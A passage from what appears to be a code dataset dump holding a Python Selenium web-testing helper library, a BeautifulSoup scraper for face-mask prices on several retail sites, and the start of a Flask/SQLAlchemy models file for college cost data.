toggle_checkbox(id_or_elem)\n\n\ndef _make_keycode(key_to_make):\n \"\"\"\n Take a key and return a keycode\"\"\"\n k = keys.Keys()\n keycode = k.__getattribute__(key_to_make.upper())\n return keycode\n\n\ndef simulate_keys(id_or_elem, key_to_press):\n \"\"\"\n Simulate key sent to specified element.\n (available keys located in `selenium/webdriver/common/keys.py`)\n\n e.g.::\n\n simulate_keys('text_1', 'BACK_SPACE')\n\n \"\"\"\n key_element = _get_elem(id_or_elem)\n msg = 'Simulating keypress on %r with %r key' \\\n % (_get_text(key_element), key_to_press)\n logger.debug(msg)\n key_code = _make_keycode(key_to_press)\n key_element.send_keys(key_code)\n\n\n_textfields = (\n 'text', 'password', 'textarea', 'email',\n 'url', 'search', 'number', 'file')\n\n\ndef assert_textfield(id_or_elem):\n \"\"\"\n Assert that the element is a textfield, textarea or password box.\n\n Takes an id or an element object.\n Raises a failure exception if the element specified doesn't exist\n or isn't a textfield.\"\"\"\n elem = _get_elem(id_or_elem)\n _elem_is_type(elem, id_or_elem, *_textfields) # see _textfields tuple\n return elem\n\n\ndef write_textfield(id_or_elem, new_text, check=True, clear=True):\n \"\"\"\n Set the specified text into the textfield. If the text fails to write (the\n textfield contents after writing are different to the specified text) this\n function will fail. You can switch off the checking by passing\n `check=False`. The field is cleared before written to. You can switch this\n off by passing `clear=False`.\"\"\"\n textfield = assert_textfield(id_or_elem)\n msg = 'Writing to textfield %r with text %r' \\\n % (_get_text(textfield), new_text)\n logger.debug(msg)\n\n # clear field like this, don't use clear()\n if clear:\n textfield.send_keys(keys.Keys().CONTROL, 'a')\n textfield.send_keys(keys.Keys().DELETE)\n\n if isinstance(new_text, unicode):\n textfield.send_keys(new_text)\n else:\n textfield.send_keys(str(new_text))\n if not check:\n return\n logger.debug('Check text wrote correctly')\n current_text = textfield.get_attribute('value')\n if current_text != new_text:\n msg = 'Textfield: %r - did not write. Text was: %r' \\\n % (_get_text(textfield), current_text)\n _raise(msg)\n\n\ndef assert_link(id_or_elem):\n \"\"\"\n Assert that the element is a link.\n\n Raises a failure exception if the element specified doesn't exist or\n isn't a link\"\"\"\n link = _get_elem(id_or_elem)\n if link.tag_name != 'a':\n msg = 'The text %r is not part of a Link or a Link ID' \\\n % _get_text(link)\n _raise(msg)\n return link\n\n\ndef get_link_url(id_or_elem):\n \"\"\"Return the URL from a link.\"\"\"\n logger.debug('Getting url from link %r' % id_or_elem)\n link = assert_link(id_or_elem)\n link_url = link.get_attribute('href')\n return link_url\n\n\ndef get_current_url():\n \"\"\"Gets the URL of the current page.\"\"\"\n return browser.current_url\n\n\ndef click_link(id_or_elem, check=False, wait=True):\n \"\"\"\n Click the specified link. As some links do redirects the location you end\n up at is not checked by default. If you pass in `check=True` then this\n action asserts that the resulting url is the link url.\n\n By default this action will wait until a page with a body element is\n available after the click. You can switch off this behaviour by passing\n `wait=False`.\"\"\"\n link = assert_link(id_or_elem)\n link_url = link.get_attribute('href')\n\n if browsermob_proxy is not None:\n _logger.debug('Capturing http traffic...')\n browsermob_proxy.new_har()\n\n logger.debug('Clicking link %r' % _get_text(link))\n link.click()\n\n if wait:\n _waitforbody()\n\n if browsermob_proxy is not None:\n logger.debug('Saving HAR output')\n _make_results_dir()\n browsermob_proxy.save_har(_make_useable_har_name())\n\n # some links do redirects - so we\n # don't check by default\n if check:\n assert_url(link_url)\n\n\ndef assert_displayed(id_or_elem):\n \"\"\"\n Assert that the element is displayed.\n\n Takes an id or an element object.\n Raises a failure exception if the element specified doesn't exist or isn't\n displayed. Returns the element if it is displayed.\"\"\"\n element = _get_elem(id_or_elem)\n if not element.is_displayed():\n message = 'Element is not displayed'\n _raise(message)\n return element\n\ndef assert_not_displayed(id_or_elem):\n \"\"\"\n Assert that the element is not displayed.\n\n Takes an id or an element object.\n Raises a failure exception if the element specified doesn't exist or is\n displayed. Returns the element if it is not displayed.\"\"\"\n element = _get_elem(id_or_elem)\n if element.is_displayed():\n message = 'Element is displayed'\n _raise(message)\n return element\n\ndef click_element(id_or_elem, wait=True):\n \"\"\"\n Click on an element of any kind not specific to links or buttons.\n\n By default this action will wait until a page with a body element is\n available after the click. You can switch off this behaviour by passing\n `wait=False`.\"\"\"\n elem = _get_elem(id_or_elem)\n\n if browsermob_proxy is not None:\n logger.debug('Capturing http traffic...')\n browsermob_proxy.new_har()\n\n logger.debug('Clicking element %r' % _get_text(elem))\n elem.click()\n\n if wait:\n _waitforbody()\n\n if browsermob_proxy is not None:\n logger.debug('Saving HAR output')\n _make_results_dir()\n browsermob_proxy.save_har(_make_useable_har_name())\n\n\ndef assert_title(title):\n \"\"\"Assert the page title is as specified.\"\"\"\n real_title = browser.title\n msg = 'Title is: %r. Should be: %r' % (real_title, title)\n if real_title != title:\n _raise(msg)\n\n\ndef assert_title_contains(text, regex=False):\n \"\"\"\n Assert the page title contains the specified text.\n\n set `regex=True` to use a regex pattern.\"\"\"\n real_title = browser.title\n msg = 'Title is: %r. Does not contain %r' % (real_title, text)\n if regex:\n if not re.search(text, real_title):\n _raise(msg)\n else:\n if not text in real_title:\n _raise(msg)\n\n\ndef assert_url(url):\n \"\"\"\n Assert the current url is as specified. Can be an absolute url or\n relative to the base url.\"\"\"\n url = _fix_url(url)\n url = _add_trailing_slash(url)\n real_url = browser.current_url\n real_url = _add_trailing_slash(real_url)\n msg = 'Url is: %r. Should be: %r' % (real_url, url)\n if url != real_url:\n _raise(msg)\n\n\ndef assert_url_contains(text, regex=False):\n \"\"\"\n Assert the current url contains the specified text.\n\n set `regex=True` to use a regex pattern.\"\"\"\n real_url = browser.current_url\n msg = 'Url is %r. Does not contain %r' % (real_url, text)\n if regex:\n if not re.search(text, real_url):\n _raise(msg)\n else:\n if text not in real_url:\n _raise(msg)\n\n\n_TIMEOUT = 20\n_POLL = 0.1\n\n\ndef set_wait_timeout(timeout, poll=None):\n \"\"\"\n Set the timeout, in seconds, used by `wait_for`. The default at the start\n of a test is always 10 seconds.\n\n The optional second argument, is how long (in seconds) `wait_for` should\n wait in between checking its condition (the poll frequency). The default\n at the start of a test is always 0.1 seconds.\"\"\"\n msg = 'Setting wait timeout to %rs' % timeout\n if poll is not None:\n msg += ('. Setting poll time to %rs' % poll)\n logger.debug(msg)\n _set_wait_timeout(timeout, poll)\n\n\ndef _set_wait_timeout(timeout, poll=None):\n global _TIMEOUT\n global _POLL\n _TIMEOUT = timeout\n if poll is not None:\n _POLL = poll\n\n\ndef get_wait_timeout():\n \"\"\"Get the timeout, in seconds, used by `wait_for`.\"\"\"\n return _TIMEOUT\n\n\ndef _get_name(obj):\n try:\n return obj.__name__\n except:\n return repr(obj)\n\n\ndef _wait_for(condition, refresh_page, timeout, poll, *args, **kwargs):\n msg = '%s(%r)' % (_get_name(condition),\n args[0] if args else kwargs if kwargs else '')\n logger.debug('Waiting for %s' % msg)\n # Disable logging levels equal to or lower than INFO.\n logging.disable(logging.INFO)\n try:\n max_time = time.time() + timeout\n while True:\n #refresh the page if requested\n if refresh_page:\n refresh()\n e = None\n try:\n result = condition(*args, **kwargs)\n except AssertionError as e:\n pass\n else:\n if result is not False:\n break\n if time.time() > max_time:\n error = 'Timed out waiting for: %s' % msg\n if e:\n error += '\\nError during wait: %s' % e\n _raise(error)\n time.sleep(poll)\n finally:\n # Re-enable logging.\n logging.disable(logging.NOTSET)\n\n\n@retry_on_stale_element\ndef wait_for(condition, *args, **kwargs):\n \"\"\"\n Wait for an action to pass. Useful for checking the results of actions\n that may take some time to complete.\n\n This action takes a condition function and any arguments it should be\n called with. The condition function can either be an action or a function\n that returns True for success and False for failure. For example::\n\n wait_for(assert_title, 'Some page title')\n\n If the specified condition does not become true within 10 seconds then\n `wait_for` fails.\n\n You can set the timeout for `wait_for` by calling `set_wait_timeout`.\"\"\"\n _wait_for(condition, False, _TIMEOUT, _POLL, *args, **kwargs)\n\n\ndef wait_for_and_refresh(condition, *args, **kwargs):\n \"\"\"\n Wait for an action to pass. Useful for checking the results of actions\n that may take some time to complete. The difference to wait_for() is, that\n wait_for_and_refresh() refresh the current page with refresh() after every\n condition check.\n\n This action takes a condition function and any arguments it should be\n called with. The condition function can either be an action or a function\n that returns True for success and False for failure. For example::\n\n wait_for_and_refresh(assert_title, 'Some page title')\n\n If the specified condition does not become true within 10 seconds then\n `wait_for_and_refresh` fails.\n\n You can set the timeout for `wait_for_and_refresh` by calling\n `set_wait_timeout`.\n \"\"\"\n _wait_for(condition, True, _TIMEOUT, _POLL, *args, **kwargs)\n\n\ndef fails(action, *args, **kwargs):\n \"\"\"\n This action is particularly useful for *testing* other actions, by\n checking that they fail when they should do. `fails` takes a function\n (usually an action) and any arguments and keyword arguments to call the\n function with. If calling the function raises an AssertionError then\n `fails` succeeds. If the function does *not* raise an AssertionError then\n this action raises the appropriate failure exception. Alll other\n exceptions will be propagated normally.\"\"\"\n logger.debug('Trying action failure: %s' % _get_name(action))\n try:\n action(*args, **kwargs)\n except AssertionError:\n return\n msg = 'Action %r did not fail' % _get_name(action)\n _raise(msg)\n\n\ndef _get_elem(id_or_elem):\n if isinstance(id_or_elem, WebElement):\n return id_or_elem\n try:\n return browser.find_element_by_id(id_or_elem)\n except (NoSuchElementException, WebDriverException):\n msg = 'Element with id: %r does not exist' % id_or_elem\n _raise(msg)\n\n\n# Takes an optional 2nd input type for cases like textfield & password\n# where types are similar\ndef _elem_is_type(elem, name, elem_types):\n try:\n result = elem.get_attribute('type')\n except NoSuchAttributeException:\n msg = 'Element has no type attribute'\n _raise(msg)\n if not result in elem_types:\n msg = 'Element %r is not one of %r' % (name, elem_types)\n _raise(msg)\n\n\ndef assert_dropdown(id_or_elem):\n \"\"\"Assert the specified element is a select drop-list.\"\"\"\n elem = _get_elem(id_or_elem)\n #FIXME: we should have a dedicated function to be able to do a multiple select\n _elem_is_type(elem, id_or_elem, ('select-one', 'select-multiple'))\n return elem\n\n\ndef set_dropdown_value(id_or_elem, text=None, value=None):\n \"\"\"Set the select drop-list to a text or value specified.\"\"\"\n elem = assert_dropdown(id_or_elem)\n logger.debug(\n 'Setting %r option list to %r' % (_get_text(elem), text or value))\n if text and not value:\n for element in elem.find_elements_by_tag_name('option'):\n if element.text == text:\n element.click()\n return\n msg = 'The following option could not be found in the list: %r' % text\n elif value and not text:\n for element in elem.find_elements_by_tag_name('option'):\n if element.get_attribute(\"value\") == value:\n element.click()\n return\n msg = 'The following option could not be found in the list: %r' % value\n else:\n msg = 'Use set_dropdown_value() with either text or value!'\n _raise(msg)\n\n\ndef assert_dropdown_value(id_or_elem, text_in):\n \"\"\"Assert the specified select drop-list is set to the specified value.\"\"\"\n elem = assert_dropdown(id_or_elem)\n # Because there is no way to connect the current\n # text of a select element we have to use 'value'\n current = elem.get_attribute('value')\n for element in elem.find_elements_by_tag_name('option'):\n if text_in == element.text and \\\n current == element.get_attribute('value'):\n return\n msg = 'The option is not currently set to: %r' % text_in\n _raise(msg)\n\n\ndef assert_radio(id_or_elem):\n \"\"\"\n Assert the specified element is a radio button.\n\n Takes an id or an element object.\n Raises a failure exception if the element specified doesn't exist or isn't\n a radio button\"\"\"\n elem = _get_elem(id_or_elem)\n _elem_is_type(elem, id_or_elem, 'radio')\n return elem\n\n\ndef assert_radio_value(id_or_elem, value):\n \"\"\"\n Assert the specified element is a radio button with the specified value;\n True for selected and False for unselected.\n\n Takes an id or an element object.\n Raises a failure exception if the element specified doesn't exist or isn't\n a radio button\"\"\"\n elem = assert_radio(id_or_elem)\n selected = elem.is_selected()\n msg = 'Radio %r should be set to: %s.' % (_get_text(elem), value)\n if value != selected:\n _raise(msg)\n\n\ndef set_radio_value(id_or_elem):\n \"\"\"Select the specified radio button.\"\"\"\n elem = assert_radio(id_or_elem)\n logger.debug('Selecting radio button item %r' % _get_text(elem))\n elem.click()\n\n\ndef _get_text(elem):\n text = None\n try:\n text = elem.text\n except InvalidElementStateException:\n pass\n if text:\n # Note that some elements (like textfields) return empty string\n # for text and we still need to call value\n return text\n try:\n text = elem.get_attribute('value')\n except InvalidElementStateException:\n pass\n return text\n\n\ndef assert_text(id_or_elem, text):\n \"\"\"\n Assert the specified element text is as specified.\n\n Raises a failure exception if the element specified doesn't exist or isn't\n as specified\"\"\"\n elem = _get_elem(id_or_elem)\n real = _get_text(elem)\n if real is None:\n msg = 'Element %r has no text attribute' % _get_text(elem)\n _raise(msg)\n if real != text:\n msg = 'Element text should be %r. It is %r.' % (text, real)\n _raise(msg)\n\n\ndef assert_text_contains(id_or_elem, text, regex=False):\n \"\"\"\n Assert the specified element contains the specified text.\n\n set `regex=True` to use a regex pattern.\"\"\"\n elem = _get_elem(id_or_elem)\n real = _get_text(elem)\n if real is None:\n msg = 'Element %r has no text attribute' % _get_text(elem)\n _raise(msg)\n msg = 'Element text is %r. Does not contain %r' % (real, text)\n if regex:\n if not re.search(text, real):\n _raise(msg)\n else:\n if text not in real:\n _raise(msg)\n\n\ndef _check_text(elem, text):\n return _get_text(elem) == text\n\n\ndef _match_text(elem, regex):\n text = _get_text(elem) or ''\n return bool(re.search(regex, text))\n\n\ndef get_elements(tag=None, css_class=None, id=None, text=None,\n text_regex=None, **kwargs):\n \"\"\"\n This function will find and return all matching elements by any of several\n attributes. If the elements cannot be found from the attributes you\n provide, the call will fail with an exception.\n\n You can specify as many or as few attributes as you like.\n\n `text_regex` finds elements by doing a regular expression search against\n the text of elements. It cannot be used in conjunction with the `text`\n argument and cannot be the *only* argument to find elements.\"\"\"\n if text and text_regex:\n raise TypeError(\"You can't use text and text_regex arguments\")\n\n selector_string = ''\n if tag:\n selector_string = tag\n if css_class:\n css_class_selector = css_class.strip().replace(' ', '.')\n selector_string += ('.%s' % css_class_selector)\n if id:\n selector_string += ('#%s' % id)\n\n selector_string += ''.join(['[%s=%r]' % (key, value) for\n key, value in kwargs.items()])\n try:\n if text and not selector_string:\n elems = browser.find_elements_by_xpath('//*[text() = %r]' % text)\n else:\n if not selector_string:\n msg = 'Could not identify element: no arguments provided'\n _raise(msg)\n logger.debug('Finding element: %s' % selector_string)\n elems = browser.find_elements_by_css_selector(selector_string)\n except (WebDriverException, NoSuchElementException) as e:\n msg = 'Element not found: %s' % e\n _raise(msg)\n\n if text:\n # if text was specified, filter elements\n elems = [element for element in elems if _check_text(element, text)]\n elif text_regex:\n elems = [elem for elem in elems if _match_text(elem, text_regex)]\n\n if not elems:\n msg = 'Could not identify elements: 0 elements found'\n _raise(msg)\n\n return elems\n\n\ndef get_element(tag=None, css_class=None, id=None, text=None,\n text_regex=None, **kwargs):\n \"\"\"\n This function will find and return an element by any of several\n attributes. If the element cannot be found from the attributes you\n provide, or the attributes match more than one element, the call will fail\n with an exception.\n\n Finding elements is useful for checking that the element exists, and also\n for passing to other actions that work with element objects.\n\n You can specify as many or as few attributes as you like, so long as they\n uniquely identify one element.\n\n `text_regex` finds elements by doing a regular expression search against\n the text of elements. It cannot be used in conjunction with the `text`\n argument and cannot be the *only* argument to find elements.\"\"\"\n elems = get_elements(tag=tag, css_class=css_class,\n id=id, text=text, text_regex=text_regex, **kwargs)\n\n if len(elems) != 1:\n msg = 'Could not identify element: %s elements found' % len(elems)\n _raise(msg)\n\n return elems[0]\n\n\ndef exists_element(tag=None, css_class=None, id=None, text=None,\n text_regex=None, **kwargs):\n \"\"\"\n This function will find if an element exists by any of several\n attributes. It returns True if the element is found or False\n if it can't be found.\n\n You can specify as many or as few attributes as you like.\"\"\"\n try:\n get_elements(tag=tag, css_class=css_class, id=id, text=text,\n text_regex=text_regex, **kwargs)\n return True\n except AssertionError:\n return False\n\n\ndef assert_element(tag=None, css_class=None, id=None, text=None,\n text_regex=None, **kwargs):\n \"\"\"\n Assert an element exists by any of several attributes.\n\n You can specify as many or as few attributes as you like.\"\"\"\n try:\n elems = get_elements(tag=tag, css_class=css_class, id=id, text=text,\n text_regex=text_regex, **kwargs)\n return elems\n except AssertionError:\n msg = 'Could not assert element exists'\n _raise(msg)\n\n\ndef assert_button(id_or_elem):\n \"\"\"\n Assert that the specified element is a button.\n\n Takes an id or an element object.\n Raises a failure exception if the element specified doesn't exist or isn't\n a button\"\"\"\n elem = _get_elem(id_or_elem)\n if elem.tag_name == 'button':\n return elem\n if elem.get_attribute('type') == 'button':\n return elem\n _elem_is_type(elem, id_or_elem, 'submit')\n return elem\n\n\ndef click_button(id_or_elem, wait=True):\n \"\"\"\n Click the specified button.\n\n By default this action will wait until a page with a body element is\n available after the click. You can switch off this behaviour by passing\n `wait=False`.\"\"\"\n button = assert_button(id_or_elem)\n\n if browsermob_proxy is not None:\n logger.debug('Capturing http traffic...')\n browsermob_proxy.new_har()\n\n logger.debug('Clicking button %r' % _get_text(button))\n button.click()\n\n if wait:\n _waitforbody()\n\n if browsermob_proxy is not None:\n logger.debug('Saving HAR output')\n _make_results_dir()\n browsermob_proxy.save_har(_make_useable_har_name())\n\n\ndef get_elements_by_css(selector):\n \"\"\"Find all elements that match a css selector.\"\"\"\n try:\n return browser.find_elements_by_css_selector(selector)\n except (WebDriverException, NoSuchElementException) as e:\n msg = 'Element not found: %s' % e\n _raise(msg)\n\n\ndef get_element_by_css(selector):\n \"\"\"Find an element by css selector.\"\"\"\n elements = get_elements_by_css(selector)\n if len(elements) != 1:\n msg = 'Could not identify element: %s elements found' % len(elements)\n _raise(msg)\n return elements[0]\n\n\ndef get_elements_by_xpath(selector):\n \"\"\"Find all elements that match an xpath.\"\"\"\n try:\n return browser.find_elements_by_xpath(selector)\n except (WebDriverException, NoSuchElementException) as e:\n msg = 'Element not found: %s' % e\n _raise(msg)\n\n\ndef get_element_by_xpath(selector):\n \"\"\"Find an element by xpath.\"\"\"\n elements = get_elements_by_xpath(selector)\n if len(elements) != 1:\n msg = 'Could not identify element: %s elements found' % len(elements)\n _raise(msg)\n return elements[0]\n\n\ndef _waitforbody():\n wait_for(get_element, tag='body')\n\n\ndef get_page_source():\n \"\"\"Gets the source of the current page.\"\"\"\n return browser.page_source\n\n\ndef close_window():\n \"\"\" Closes the current window \"\"\"\n logger.debug('Closing the current window')\n browser.close()\n\n\ndef switch_to_window(index_or_name=None):\n \"\"\"\n Switch focus to the specified window (by index or name).\n\n if no window is given, switch focus to the default window.\"\"\"\n if index_or_name is None:\n logger.debug('Switching to default window')\n browser.switch_to_window('')\n elif isinstance(index_or_name, int):\n index = index_or_name\n window_handles = browser.window_handles\n if index >= len(window_handles):\n msg = 'Index %r is greater than available windows.' % index\n _raise(msg)\n window = window_handles[index]\n try:\n logger.debug('Switching to window: %r' % window)\n browser.switch_to_window(window)\n except NoSuchWindowException:\n msg = 'Could not find window: %r' % window\n _raise(msg)\n else:\n name = index_or_name\n try:\n logger.debug('Switching to window: %r' % name)\n browser.switch_to_window(name)\n except NoSuchWindowException:\n msg = 'Could not find window: %r' % name\n _raise(msg)\n\n\ndef switch_to_frame(index_or_name=None):\n \"\"\"\n Switch focus to the specified frame (by index or name).\n\n if no frame is given, switch focus to the default content frame.\"\"\"\n if index_or_name is None:\n logger.debug('Switching to default content frame')\n browser.switch_to_default_content()\n else:\n logger.debug('Switching to frame: %r' % index_or_name)\n try:\n browser.switch_to_frame(index_or_name)\n except NoSuchFrameException:\n msg = 'Could not find frame: %r' % index_or_name\n _raise(msg)\n\n\ndef _alert_action(action, expected_text=None, text_to_write=None):\n \"\"\"\n Accept or dismiss a JavaScript alert, confirmation or prompt.\n\n Optionally, it takes the expected text of the Popup box to check it,\n and the text to write in the prompt.\"\"\"\n wait_for(browser.switch_to_alert)\n alert = browser.switch_to_alert()\n alert_text = alert.text\n if expected_text and expected_text != alert_text:\n error_message = 'Element text should be %r. It is %r.' \\\n % (expected_text, alert_text)\n _raise(error_message)\n if text_to_write:\n alert.send_keys(text_to_write)\n if action == 'accept':\n alert.accept()\n elif action == 'dismiss':\n alert.dismiss()\n else:\n _raise('%r is an unknown action for an alert' % action)\n\n\ndef accept_alert(expected_text=None, text_to_write=None):\n \"\"\"\n Accept a JavaScript alert, confirmation or prompt.\n\n Optionally, it takes the expected text of the Popup box to check it,\n and the text to write in the prompt.\n\n Note that the action that opens the alert should not wait for a page with\n a body element. This means that you should call functions like\n click_element with the argument wait=Fase.\"\"\"\n logger.debug('Accepting Alert')\n _alert_action('accept', expected_text, text_to_write)\n\n\ndef dismiss_alert(expected_text=None, text_to_write=None):\n \"\"\"\n Dismiss a JavaScript alert.\n\n Optionally, it takes the expected text of the Popup box to check it.,\n and the text to write in the prompt.\n\n Note that the action that opens the alert should not wait for a page with\n a body element. This means that you should call functions like\n click_element with the argument wait=Fase.\"\"\"\n logger.debug('Dismissing Alert')\n _alert_action('dismiss', expected_text, text_to_write)\n\n\ndef assert_table_headers(id_or_elem, headers):\n \"\"\"\n Assert table `id_or_elem` has headers (
tags) where the text matches\n the sequence `headers`.\n \"\"\"\n logger.debug('Checking headers for %r' % (id_or_elem,))\n elem = _get_elem(id_or_elem)\n if not elem.tag_name == 'table':\n _raise('Element %r is not a table.' % (id_or_elem,))\n header_elems = elem.find_elements_by_tag_name('th')\n header_text = [_get_text(elem) for elem in header_elems]\n if not header_text == headers:\n msg = ('Expected headers:%r. Actual headers%r\\n' %\n (headers, header_text))\n _raise(msg)\n\n\ndef assert_table_has_rows(id_or_elem, num_rows):\n \"\"\"\n Assert the specified table has the specified number of rows (
\r\n the corresponding div_class_name is:\r\n div_class_name = 'price__sale'\r\n '''\r\n def get_price_div(self, url, div_class_name):\r\n req = requests.get(url)\r\n html = req.text\r\n div_bf = BeautifulSoup(html,features=\"lxml\")\r\n # class_name = 'price__sale'\r\n texts = div_bf.find_all('div', class_=div_class_name)\r\n return str(texts)\r\n \r\n def get_price_id(self, url, div_id_name):\r\n req = requests.get(url)\r\n html = req.text\r\n div_bf = BeautifulSoup(html,features=\"lxml\")\r\n texts = div_bf.find_all('div', id=div_id_name)\r\n return str(texts)\r\n '''\r\n Extract price from price contained div\r\n Parameters: div_bf - (string); class_name - (string)\r\n Return: price - (string)\r\n\r\n div_bf --> get from get_price_div function\r\n class_name can be found in ... section which contains price\r\n eg.\r\n the price contained ... section is\r\n $9.99 = $0\r\n so the class_name is:\r\n class_name = 'price-item price-item--sale'\r\n '''\r\n def get_price(self, div_bf, class_name, div_tag):\r\n price_bf = BeautifulSoup(div_bf,features=\"lxml\")\r\n price = str(price_bf.find(div_tag, {'class' : class_name}).string)\r\n return price\r\n\r\n def abstract_price(self, url):\r\n\r\n # headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36', \"Upgrade-Insecure-Requests\": \"1\",\"DNT\": \"1\",\"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\"Accept-Language\": \"en-US,en;q=0.5\",\"Accept-Encoding\": \"gzip, deflate\"}\r\n # req = requests.get(url, headers=headers)\r\n \r\n # modify each if/elif to abstract price -- Siqi\r\n\r\n #Pod\r\n if url == 'https://www.podsupplies.com/products/kids-mask?variant=37609154871491':\r\n url = 'https://www.podsupplies.com/products/kids-mask?variant=37609154871491'\r\n s_div_name = 'price__sale'\r\n # o_div_name = 'price__regular'\r\n sale_span_name = 'price-item price-item--sale'\r\n # orig_span_name = 'price-item price-item--regular'\r\n s_div = self.get_price_div(url, s_div_name)\r\n sale_price = self.get_price(s_div, sale_span_name,'span').strip()\r\n\r\n #Wayre\r\n elif url == 'https://www.shopwayre.com/collections/all/products/kids-high-tech-washable-mask':\r\n # There are many prices in this page, I choose only one from them -- Siqi\r\n # soup = BeautifulSoup(req.text, 'html.parser')\r\n # texts = soup.find('meta', property='product:price:amount')\r\n # sale_price = '$'+texts[\"content\"]\r\n url = 'https://www.shopwayre.com/collections/all/products/kids-high-tech-washable-mask'\r\n s_div_name = \"ProductMeta__PriceList Heading\" \r\n sale_span_name = \"ProductMeta__Price Price Price--highlight Text--subdued u-h4\"\r\n s_div = self.get_price_div(url, s_div_name)\r\n sale_price = self.get_price(s_div, sale_span_name,'span').strip()\r\n\r\n\r\n # Happy Mask \r\n elif url == 'https://www.happymasks.com/collections/pro/products/black-pro':\r\n url = 'https://www.happymasks.com/collections/pro/products/black-pro'\r\n s_div_name = 'price-container'\r\n sale_span_name = 'product-single__price'\r\n s_div = self.get_price_div(url, s_div_name)\r\n sale_price = self.get_price(s_div, sale_span_name,'span').strip()\r\n \r\n #Honeywell \r\n elif url == 'https://ppe.honeywell.com/collections/face-covers/products/honeywell-3d-knit-face-mask-light-grey-size-s-m-4-pk':\r\n url = 'https://ppe.honeywell.com/collections/face-covers/products/honeywell-3d-knit-face-mask-light-grey-size-s-m-4-pk'\r\n s_div_name = 'product-price--mobile'\r\n # sale_span_name = 'money bfx-price'\r\n sale_span_name = 'money'\r\n # s_div = self.get_price_div(url, s_div_name)\r\n s_div = self.get_price_id(url, s_div_name)\r\n\r\n price_bf = BeautifulSoup(s_div,features=\"lxml\")\r\n price = str(price_bf.find('span', {'class' : 'onsale'}))\r\n\r\n sale_price = self.get_price(price, sale_span_name,'span').strip()\r\n\r\n #Caraa\r\n elif url == 'https://caraasport.com/products/3-tailored-junior-masks?variant=39513097764944':\r\n url = 'https://caraasport.com/products/3-tailored-junior-masks?variant=39513097764944'\r\n s_div_name = 'price-flex'\r\n sale_span_name = 'f4-l f3-ns f4 ttu gold tracked brandon'\r\n s_div = self.get_price_div(url, s_div_name)\r\n # sale_price = self.get_price(s_div, sale_span_name,'span').strip()\r\n price_bf = BeautifulSoup(s_div, features=\"lxml\")\r\n price = str(price_bf.find('span', {'id' : \"ProductPrice\"})['content'])\r\n\r\n price_bf = BeautifulSoup(price, features=\"lxml\")\r\n price = str(price_bf.find('span', {'class' : 'money'}).string)\r\n sale_price = price.strip()\r\n\r\n #Flomask \r\n elif url == 'https://flomask.com/collections/flo-mask-bundle-mask-12-filters/products/flo-mask-essential-bundle':\r\n url = 'https://flomask.com/collections/flo-mask-bundle-mask-12-filters/products/flo-mask-essential-bundle'\r\n s_div_name = \"price__regular\"\r\n sale_span_name = \"price-item price-item--regular\"\r\n s_div = self.get_price_div(url, s_div_name)\r\n sale_price = self.get_price(s_div, sale_span_name,'span').strip()\r\n \r\n # 3M\r\n elif url == 'https://www.3m.com/3M/en_US/p/d/v000075539/':\r\n url = 'https://www.3m.com/3M/en_US/p/d/v000075539/'\r\n #########################################################################\r\n # 3M is somehow special with JavaScript price part, we tried following methods\r\n # but not succeed, propbably multi-thread Render can help\r\n #########################################################################\r\n # s_div_name = \"mkpl-price\"\r\n # sale_span_name = \"mkpl-price_value\"\r\n # s_div = self.get_price_div(url, s_div_name)\r\n # html = req.text\r\n # div_bf = BeautifulSoup(html, features=\"lxml\")\r\n # texts = div_bf.find_all('div', class_=\"MMM--selectionBox--cntnr\")\r\n # print(texts)\r\n # sale_price = self.get_price(s_div, sale_span_name,'span').strip()\r\n\r\n sale_price = \"$0\"\r\n \r\n # page = Render(url)\r\n # html = BeautifulSoup(page.html, 'html.parser')\r\n # price_bf = html.find('p', class_='mkpl-price_value')\r\n # print(html)\r\n # print(\"????\")\r\n # print(price_bf.text)\r\n # sale_price = re.findall(r\"(\\$[0-9]+\\.*[0-9]*)\", price_bf.text)[0]\r\n\r\n else:\r\n sale_price = \"$0\"\r\n print(sale_price)\r\n print(url)\r\n return sale_price\r\n \r\n \r\n \r\n","repo_name":"OrdinaryCrazy/Kayak_for_Masks","sub_path":"KayakMask/masklink/spider_1206.py","file_name":"spider_1206.py","file_ext":"py","file_size_in_byte":8361,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"28078704736","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config.from_pyfile('config.py')\ndb = SQLAlchemy(app)\n\n# Models\nclass College(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(2048), unique=True)\n state_abbr = db.Column(db.String(16))\n lat = db.Column(db.Float())\n lon = db.Column(db.Float())\n student_expense = db.relationship('StudentExpense', backref='college', \n uselist=False)\n degree_salaries = db.relationship('CollegeDegreeSalary', backref='college')\n\n def __init__(self, name, state_abbr, lat, lon):\n self.name = name\n self.state_abbr = state_abbr\n self.lat = lat\n self.lon = lon\n\n def __repr__(self):\n return '\\nname: {}, state_abbr: {}, lat: {}, lon: {}\\n'.format(self.name, \n self.state_abbr, self.lat, self.lon)\n\nclass StudentExpense(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n college_id = db.Column(db.Integer, db.ForeignKey('college.id'), unique=True)\n in_state_tuition = db.Column(db.Integer)\n out_state_tuition = db.Column(db.Integer)\n book_supplies = db.Column(db.Integer)\n on_campus_room_board = db.Column(db.Integer)\n off_campus_room_board = db.Column(db.Integer)\n average_aid = db.Column(db.Integer)\n\n def __init__(self, college_id, in_state_tuition, out_state_tuition, \\\n book_supplies, on_campus_room_board, off_campus_room_board, average_aid):\n self.college_id = college_id\n self.in_state_tuition = in_state_tuition\n self.out_state_tuition = out_state_tuition\n self.book_supplies = book_supplies\n self.on_campus_room_board = on_campus_room_board\n self.off_campus_room_board = off_campus_room_board\n self.average_aid = average_aid\n\n def __repr__(self):\n return 'Too lazy to write repr for StudentExpense'\n\nclass CollegeExpense(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n college_id = db.Column(db.Integer, db.ForeignKey('college.id'), unique=True)\n instruction = db.Column(db.Integer)\n research = db.Column(db.Integer)\n public_service = db.Column(db.Integer)\n academic_support = db.Column(db.Integer)\n other = db.Column(db.Integer)\n\n def __init__(self, college_id, instruction, research, public_service, \\\n academic_support, other):\n self.college_id = college_id\n self.instruction = instruction,\n self.research = research\n self.public_service = public_service\n self.academic_support = academic_support\n self.other = 